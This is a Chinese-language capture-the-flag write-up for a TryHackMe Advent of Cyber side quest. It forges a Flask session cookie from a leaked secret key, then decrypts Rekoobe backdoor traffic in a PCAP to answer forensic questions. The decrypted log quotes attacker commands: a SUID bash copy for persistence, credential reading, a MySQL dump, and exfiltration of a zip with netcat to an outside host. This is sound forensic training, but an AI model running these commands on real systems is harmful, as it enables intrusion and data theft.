题目背景

“By the time you read this, you’ve already been attacked. I’m in your machine and you won’t get it back. You must be aware that the more you delay, the more information will be stolen away. Your SOC is so weak, I’ll lend them a hand. Here’s a PCAP of the attack, you can’t beat this band! If your machine you want to recover, the password I stole you’ll need to discover.”

The first of our enemies is the Frostbite Fox. Known for being the slyest of them all. She’s made her way into McSkidy’s machine. Luckily for us, our great SOC detected it all in time. While the team focuses on securing the machine, you are tasked with recovering the password the Fox stole, so we can get McSkidy’s data back.

Note: To attempt this challenge you will need to find the L1 Keycard in the main Advent of Cyber room challenges. The password in the keycard will allow you to open the ZIP file, which you can download from http://MACHINE_IP/aoc_sq_1.zip. The zip file is safe to download with MD5 of 044a78a6a1573c562bc18cefb761a578. In general, as a security practice, download the zip and analyze the forensic files on a dedicated virtual machine, and not on your host OS. The keycard will be hidden between days 1 and 4.

这道题首先有一个压缩包,我们下载下来后需要找到密码,由题目提示信息我们知道,要想找到我们的密码,就得在主房间中找到一个key,当拿到key之后,我们才可以解压压缩包,所以我们的第一个任务就是去找key

L1 keycard

当我们在完成主房间的任务的时候,我们发现了下面的提示信息

image-20241202203636047

就是让我们在github的仓库上看看能不能找到更多的信息,我们在做主线任务的时候发现了一个仓库

image-20241202204410419

from flask import Flask, render_template, request, redirect, url_for, session

app = Flask(__name__)

app.secret_key = "@09JKD0934jd712?djD"

ADMIN_USERNAME = "admin"           
ADMIN_PASSWORD = "securepassword" #CHANGE ME!!!

@app.route("/")
def home():
    if "logged_in" in session:
        return redirect(url_for("dashboard"))
    return redirect(url_for("login"))

@app.route("/login", methods=["GET", "POST"])
def login():
    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]
        if username == ADMIN_USERNAME and password == ADMIN_PASSWORD:
            session["logged_in"] = True
            session["username"] = username
            return redirect(url_for("dashboard"))
        else:
            return render_template("login.html", error="Invalid credentials!")
    return render_template("login.html")

@app.route("/dashboard")
def dashboard():
    if "logged_in" not in session:
        return redirect(url_for("login"))
    return render_template("dashboard.html")

@app.route("/data")
def data():
    if "logged_in" not in session:
        return redirect(url_for("login"))
    return render_template("data.html")

@app.route("/logout")
def logout():
    session.pop("logged_in", None)
    session.pop("username", None)
    return redirect(url_for("login"))

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8000)

里面有一个app.py,上面写了账号和密码,我们第一个想法就是去访问这个页面,看看能不能利用这个账号登陆进去,但是我们发现原账号密码已经被改掉了,我们可以尝试在自己本地起一个服务,然后用获取到的Cookie伪造管理员身份登陆进去,如下所示

image-20241202204737775

image-20241202204817489

之后我们访问data界面,出现如下界面

image-20241202204901475

我们成功找到我们的L1keycard

ad60cef872edd478daa959050f49b1ba

那一串字符就是我们压缩包的解压密码,我们拿去给压缩包解压就可以了,我们解压出来后得到一个流量包,接下来就是利用流量分析进行下面的解答

Q1

这一题要找hacker用来注册的密码,那么很显然就是找POST流量包,因为我们的注册是通过POST来进行注册的,我们直接在过滤器里面输入http.request.method == "POST"

b25236b77bd4680bd6f2b67089fea821

我们很容易就可以定位到这个流量包,右键追踪流即可

b6dd16d958aeb06c772c085138f69dd1

这里我们成功找到密码

QU9DMjAyNHtUaW55X1R

Q2

第二问要我们找到攻击者所获取的密码,因为攻击者获取了管理员的密码后,必然会进行登陆操作,所以我们只需要查看登陆的流量包即可,如下所示

b12d55df51f5a17b8484c8f52a256bfd

攻击者进行了管理员登陆,这个密码必然是获取的管理员密码,我们同样右键追踪流即可

953df9e808ae1cfd9d472d613eceb625

所以本题的答案是

pbnlfVGlueV9TaDNsbF

Q3

What is the password of the zip file transferred by the attacker?
黑客传输的zip的密码?

第三问和第四问难度激增,可以说是非常难,我们首先继续看http流量

我们可以看到攻击者以管理员登陆后进行了从远程服务器下载操作,如下所示

image-20241202210304936

我们重点关注这个ff文件,右键追踪流,如下所示

image-20241202210352986

我们可以发现获取了一个可执行文件,这个文件是一个elf文件,我们把他导出来试试,我们先以原始数据全部导出,导出为elf文件,然后删除请求头就可以了,得到download.elf文件

我们首先丢微步去检测一下

image-20241202211251417

我们发现这是个rekoobe木马,通过资料查询后,我们知道这个木马是通过ssh来进行命令执行的,我们在网上也可以找到解密脚本,如下所示

image-20241202211719323

https://github.com/alexander-utkov/rekobee-analyzer

我们把他下载下来去解密流量即可

image-20241202212154339

我们发现还需要一个-s的密钥参数,这个我们对elf文件进行逆向分析就可以找到,如下所示

b4833b5147ea33b6027189fc19b7d4cc

我们在主函数中可以找到密钥,SuP3RSeCrEt,接下来我们直接进行解密就好了,由于我们的攻击者进行攻击是在获得我们的ff文件之后进行的,所以我们只需要对之后的流量进行解密,否则流量太大,需要运行很久才能拿到结果,我们先进行导出

c5ad3e6c78b579f6f26a52acd14e9ae7

我们导出这之后的流量即可

image-20241202213357628

然后我们直接运行脚本

python analyze.py -c out.pcapng -s SuP3RSeCrEt -vv

在运行过程中我们爆出了如下错误

image-20241202215058440

问题出在pyshark上,我们去修改一下pyshark就可以了

77e413876acb3bf548cb14ca11b5f6ad

经过多次调试,我们这里终于跑通了,如下所示

root@database:/tmp# cp /bin/bash /bin/pkexeccc
→ root@database:/tmp# chmod u+s /bin/pkexeccc
→ root@database:/tmp# md5sum /bin/pkexeccc
→ 7063c3930affe123baecd3b340f1ad2c  /bin/pkexeccc
→ root@database:/tmp# md5sum /bin/bash
→ 7063c3930affe123baecd3b340f1ad2c  /bin/bash
→ root@database:/tmp# ls -l /bin/pkexeccc
→ -rwsr-xr-x 1 root root 1183448 Nov 13 00:06 /bin/pkexeccc
→ root@database:/tmp# ls -la /var/www/html/
→ total 652
→ drwxr-xr-x 3 root root   4096 Nov 12 23:24 .
→ drwxr-xr-x 3 root root   4096 Mar 15  2022 ..
→ drwxr-x--x 2 root root   4096 Nov 12 23:28 admin
→ -rw-r--r-- 1 root root 609097 Nov 12 23:15 bg.png
→ -rw-r--r-- 1 root root    494 Nov 12 22:47 config.php
→ -rw-r--r-- 1 root root   5479 Nov 12 23:19 index.php
→ -rw-r--r-- 1 root root    223 Mar 15  2022 logout.php
→ -rw-r--r-- 1 root root   5338 Nov 12 23:21 register.php
→ -rw-r--r-- 1 root root   4191 Nov 12 23:24 reset-password.php
→ -rw-r--r-- 1 root root   8644 Nov 12 23:24 welcome.php
→ root@database:/tmp# cat /var/www/html/config.php
→ <?php
→ /* Database credentials. Assuming you are running MySQL
→ server with default setting (user 'root' with no password) */
→ define('DB_SERVER', 'localhost');
→ define('DB_USERNAME', 'mcskidy');
→ define('DB_PASSWORD', 'aBT4ZfhteNRE3ah');
→ define('DB_NAME', 'website');

→ /* Attempt to connect to MySQL database */
→ $mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

→ // Check connection
→ if($mysqli === false){
→         die("ERROR: Could not connect. " . $mysqli->connect_error);
→ }
→ ?>

→ root@database:/tmp# mysql -h localhost -u mcskidy -p'aBT4ZfhteNRE3ah' -e 'show databases;'
→ mysql: [Warning] Using a password on the command line interface can be insecure.
→ +--------------------+
→ | Database           |
→ +--------------------+
→ | elves              |
→ | information_schema |
→ | website            |
→ +--------------------+
→ root@database:/tmp# mysql -h localhost -D elves -u mcskidy -p'aBT4ZfhteNRE3ah' -e 'show tables;'
→ mysql: [Warning] Using a password on the command line interface can be insecure.
→ +-----------------+
→ | Tables_in_elves |
→ +-----------------+
→ | elf             |
→ +-----------------+
→ root@database:/tmp# mysqldump -u mcskidy -p'aBT4ZfhteNRE3ah' elves elf > elves.sql
→ mysqldump: [Warning] Using a password on the command line interface can be insecure.
→ root@database:/tmp# zip -P 9jYW5fRW5jcnlwVF9iVXR elves.zip elves.sql
→   adding: elves.sql (deflated 58%)
→ root@database:/tmp# nc -w 3 10.13.44.207 9002 < elves.zip
→ root@database:/tmp# echo 'GG EZ McSkidy' > /home/mcskidy/haha.txt
→ root@database:/tmp# 
[info] Done.

我们仔细寻找,可以发现有一条zip压缩命令,就是我们要寻找的密码

f74d6ce51b9a7f379cbdc659c3d45ef5

9jYW5fRW5jcnlwVF9iVXR

Q4

What is McSkidy's password that was inside the database file stolen by the attacker?
McSkidy的密码是什么

我们用密码解压zip包,打开可以看到如下

image-20241202221242224

打开后可以看到密码

f6a0c7c14a0ee706fd71fa7dd988dc71

faXRfSXNfTjB0X0YwMGxwcm8wZn0=

image-20241202221416713

很巧妙的一道题,值得多学习反思